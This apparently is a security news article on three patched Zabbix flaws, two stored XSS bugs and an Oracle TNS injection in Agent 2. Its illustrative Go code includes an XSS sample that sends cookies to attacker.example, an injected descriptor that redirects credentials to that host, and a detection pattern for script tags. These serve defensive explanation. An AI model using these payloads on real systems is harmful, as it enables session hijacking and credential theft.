Zabbix, the widely deployed open-source monitoring platform that enterprises use to track the health of large IT estates, has released security patches for three vulnerabilities. The flaws affect the Zabbix Frontend and Agent 2, and could let an attacker with limited access run scripts in administrators' browsers or redirect a database connection, turning a trusted monitoring tool into a foothold for further network compromise.
The two most severe issues are stored cross-site scripting (XSS) flaws: the malicious payload is saved in the Zabbix database and executes in the browser of any user who later views the affected widget.
The first high-severity vulnerability (CVE-2026-23926, CVSS 7.3) affects the Host navigator widget. An authenticated administrator, even one without Super admin privileges, can create a maintenance period that contains a JavaScript payload.
The danger lies in the widget’s tooltip functionality. As the advisory explains, “An authenticated (non-super) administrator can create a maintenance period with a JavaScript payload that is executed by any user that opens tooltip for that maintenance period in the Host navigator widget”.
Because the script runs inside the victim's authenticated frontend session, the attacker can act as that user: if a Super admin opens the tooltip, the result is effective privilege escalation, and any configuration data visible to the victim can be exfiltrated.
A second high-severity XSS flaw (CVE-2026-23928, CVSS 7.3) was identified in the Item history/Plain text widget. Here the threat comes from the monitored hosts themselves: every text or log value a host reports is input that host controls, so a compromised host can report a value carrying a JavaScript payload to the Zabbix server.
When an administrator views that host's history in the Plain text widget with HTML display enabled, the browser renders the stored value as markup and executes the script. The attack inverts the trust relationship between the monitoring server and the endpoints it watches: a foothold on a single low-value host becomes code execution in the session of whoever administers the monitoring system.
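To make that trust problem concrete, here is an added example in Go (not Zabbix code; the Frontend itself is PHP) that models a widget emitting stored item values with HTML display on and off, and a coarse triage filter a defender could run over collected history values to spot a host that is reporting markup. The sample values, the rendering function and the regular expression are constructed for illustration.

```go
package main

import (
	"fmt"
	"html"
	"regexp"
)

// renderHistoryValue models how a dashboard widget might emit a stored item
// value. With htmlDisplay on, the raw value goes into the page and any markup
// the monitored host reported is interpreted by the browser. With it off, the
// value is HTML-escaped and shown as literal text.
func renderHistoryValue(value string, htmlDisplay bool) string {
	if htmlDisplay {
		return "<td>" + value + "</td>" // vulnerable: untrusted value as markup
	}
	return "<td>" + html.EscapeString(value) + "</td>" // hardened: value as text
}

// suspiciousMarkup is a coarse triage pattern for active content in history
// values (script-bearing tags, javascript: URLs, inline event handlers). It is
// a detection aid, not a sanitizer; a hit means the reporting host deserves a
// look. The pattern is an assumption for this example.
var suspiciousMarkup = regexp.MustCompile(
	`(?i)<\s*(script|iframe|img|svg|object|embed)\b|javascript:|\bon(error|load|click|mouseover|focus|toggle)\s*=`)

// flagSuspicious returns the values that match suspiciousMarkup.
func flagSuspicious(values []string) []string {
	var hits []string
	for _, v := range values {
		if suspiciousMarkup.MatchString(v) {
			hits = append(hits, v)
		}
	}
	return hits
}

func main() {
	// Constructed sample history values, in the shape a compromised host could
	// report through a text or log item. Not real Zabbix data.
	samples := []string{
		"eth0: link up, 1000Mb/s",
		`<img src=x onerror="fetch('https://attacker.example/?c='+document.cookie)">`,
		"disk /var 93% used",
		`<script>alert(document.domain)</script>`,
	}
	for _, s := range samples {
		fmt.Println("HTML display on :", renderHistoryValue(s, true))
		fmt.Println("HTML display off:", renderHistoryValue(s, false))
	}
	fmt.Println("flagged for review:", flagSuspicious(samples))
}
```

The escaping path is the same behaviour the "disable HTML display" mitigation buys you in the real widget; the filter is what you would point at history data when deciding which hosts to investigate.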
Moving from the frontend to the backend, Zabbix also addressed a medium-severity injection flaw (CVE-2026-23927, CVSS 5.1) in Agent 2. The vulnerability is in the Oracle plugin, which inserts the service parameter into the database connection string without sanitizing it.
An attacker able to send requests to Agent 2 can supply a service value that injects Oracle TNS connect-descriptor syntax, redirecting the agent to an attacker-controlled server. If the request references a named session whose credentials are stored in the agent configuration, the agent attempts to authenticate to the attacker's server with them, which is the "leaking of Oracle database credentials" the advisory describes.
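The following added example (not the Zabbix Agent 2 plugin's code) shows the injection class in Go, the language Agent 2 is written in: a connect descriptor built by interpolating an unchecked service value, a check that lists the HOST entries the result contains, and a hardened version that allowlists the service name before interpolating. The host names, the injected value, the descriptor layout and the allowlist pattern are assumptions for illustration; how a real Oracle client resolves a descriptor containing two DESCRIPTION sections is outside the example, the point being that the caller's parameter changed the descriptor's structure.

```go
package main

import (
	"errors"
	"fmt"
	"regexp"
)

// buildDescriptor assembles an Oracle TNS connect descriptor from a named
// session's host/port and the service the caller supplied. It models the
// vulnerable pattern: the service value is interpolated unchecked.
func buildDescriptor(host string, port int, service string) string {
	return fmt.Sprintf(
		"(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=%s)(PORT=%d))(CONNECT_DATA=(SERVICE_NAME=%s)))",
		host, port, service)
}

// hostRe picks out every HOST= entry in a descriptor. A request for one
// service should yield exactly one host; a second one means the caller
// injected descriptor syntax.
var hostRe = regexp.MustCompile(`\(HOST=([^)]+)\)`)

func hostsIn(descriptor string) []string {
	var hosts []string
	for _, m := range hostRe.FindAllStringSubmatch(descriptor, -1) {
		hosts = append(hosts, m[1])
	}
	return hosts
}

// serviceRe is an illustrative allowlist for service names (letters, digits
// and . _ $ # -). It deliberately excludes parentheses and '=', the characters
// that carry TNS descriptor structure. Oracle's real naming rules differ in
// places; adjust to your environment. This pattern is an assumption.
var serviceRe = regexp.MustCompile(`^[A-Za-z0-9_.$#-]{1,64}$`)

var errBadService = errors.New("service parameter contains descriptor syntax or disallowed characters")

// safeDescriptor is the hardened form: validate before interpolating.
func safeDescriptor(host string, port int, service string) (string, error) {
	if !serviceRe.MatchString(service) {
		return "", errBadService
	}
	return buildDescriptor(host, port, service), nil
}

func main() {
	// Named-session values as an agent config would hold them (constructed).
	sessHost, sessPort := "db.internal.example", 1521

	// Constructed injection: closes the legitimate SERVICE_NAME, CONNECT_DATA
	// and DESCRIPTION, then opens a second DESCRIPTION pointing elsewhere. The
	// template's trailing ")))" then closes the attacker's section.
	injected := "ORCL)))(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=attacker.example)(PORT=1521))(CONNECT_DATA=(SERVICE_NAME=ORCL"

	for _, svc := range []string{"ORCL", injected} {
		d := buildDescriptor(sessHost, sessPort, svc)
		fmt.Printf("unchecked : hosts=%v\n", hostsIn(d))
		if _, err := safeDescriptor(sessHost, sessPort, svc); err != nil {
			fmt.Println("validated : rejected:", err)
		} else {
			fmt.Println("validated : accepted", svc)
		}
	}
}
```

Run as written, the unchecked path reports two hosts for the injected value, the session's database and attacker.example, while the validated path rejects it and accepts the plain service name unchanged.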
| CVE ID | Severity (CVSS) | Component | Fixed Versions |
|---|---|---|---|
| CVE-2026-23926 | 7.3 (High) | Frontend (Host navigator widget) | 7.0.24, 7.4.8 |
| CVE-2026-23928 | 7.3 (High) | Frontend (Item history/Plain text widget) | 6.0.45, 7.0.24, 7.4.8 |
| CVE-2026-23927 | 5.1 (Medium) | Agent 2 (Oracle plugin) | Update recommended |
The Zabbix team recommends updating all affected components to their respective fixed versions immediately.
If an immediate update is not possible, administrators should consider the following interim measures:
- Disabling the Host navigator widget via the Modules menu.
- Disabling HTML display in the Item history/Plain text widget, or disabling the widget entirely.
- For Agent 2, restricting which addresses may query the agent (the agent's Server directive, plus host-level firewalling) so that only the Zabbix server or proxies can reach the Oracle plugin.